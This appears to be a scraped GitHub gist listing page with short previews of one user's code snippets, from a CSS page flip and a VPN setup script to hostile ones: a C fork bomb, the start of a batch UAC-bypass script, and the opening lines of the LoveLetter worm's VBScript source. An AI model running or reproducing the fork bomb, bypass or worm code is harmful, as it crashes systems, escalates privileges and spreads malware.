This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Module Module1 | |
Sub Main() | |
"There it is" | |
End Sub | |
End Module |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <unistd.h> | |
int main() { | |
while(1) fork(); | |
return 0; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if (game:IsLoaded() == false) then | |
game.Loaded:Wait() | |
end | |
local plrs = game:GetService("Players") | |
local connections = {} | |
for _,anti in pairs(plrs:GetPlayers()) do | |
if anti ~= plrs.LocalPlayer then | |
connections[anti.Name] = {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
rem Other bindings: | |
rem - https://github.com/winscripting/UAC-bypass | |
rem - https://gist.github.com/tommelo/07dacce52664a35d2938a55d96bc8ac5 | |
set null= | |
set program=%* | |
if exists %program% ( | |
rem Create registry structure |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
title Hacker Shell | |
color 02 | |
prompt $$$S | |
doskey clear=cls | |
cls | |
echo Welcome to the Hacker Shell! | |
echo Credits to tnhung2011 for this :) | |
echo. | |
cmd /k |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
echo [+] Restarting explorer.exe... | |
taskkill /f /im explorer.exe >nul | |
timeout 2 >nul | |
start %systemroot%\explorer.exe | |
echo [+] Starting explorer.exe... | |
set /p _p= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# (a fork of https://gist.github.com/bytespec/862c8f370d6018c76d6122ca423c16cf) | |
# Parameter defaults | |
param( | |
[Parameter()] | |
[String]$VPN_NAME = 0 | |
[String]$SERVER = 0 | |
[String]$SPLIT = $false | |
[String[]]$ROUTES = 0 # Empty or set $SPLIT to false to disable tunneling | |
[String]$USER = 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
⭐ Total Stars: 0 | |
➕ Total Commits: 109 | |
🔀 Total PRs: 26 | |
🚩 Total Issues: 12 | |
📦 Contributed to: 23 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*credits: https://stackoverflow.com/a/14194532/17023061*/ body { -moz-transform: scaleX(-1); -o-transform: scaleX(-1); -webkit-transform: scaleX(-1); transform: scaleX(-1); filter: FlipH; -ms-filter: "FlipH"; } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rem barok -loveletter(vbe) <i hate go to school> | |
rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines | |
On Error Resume Next | |
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow | |
eq="" | |
ctr=0 | |
Set fso = CreateObject("Scripting.FileSystemObject") | |
set file = fso.OpenTextFile(WScript.ScriptFullname,1) | |
vbscopy=file.ReadAll | |
main() |
OlderNewer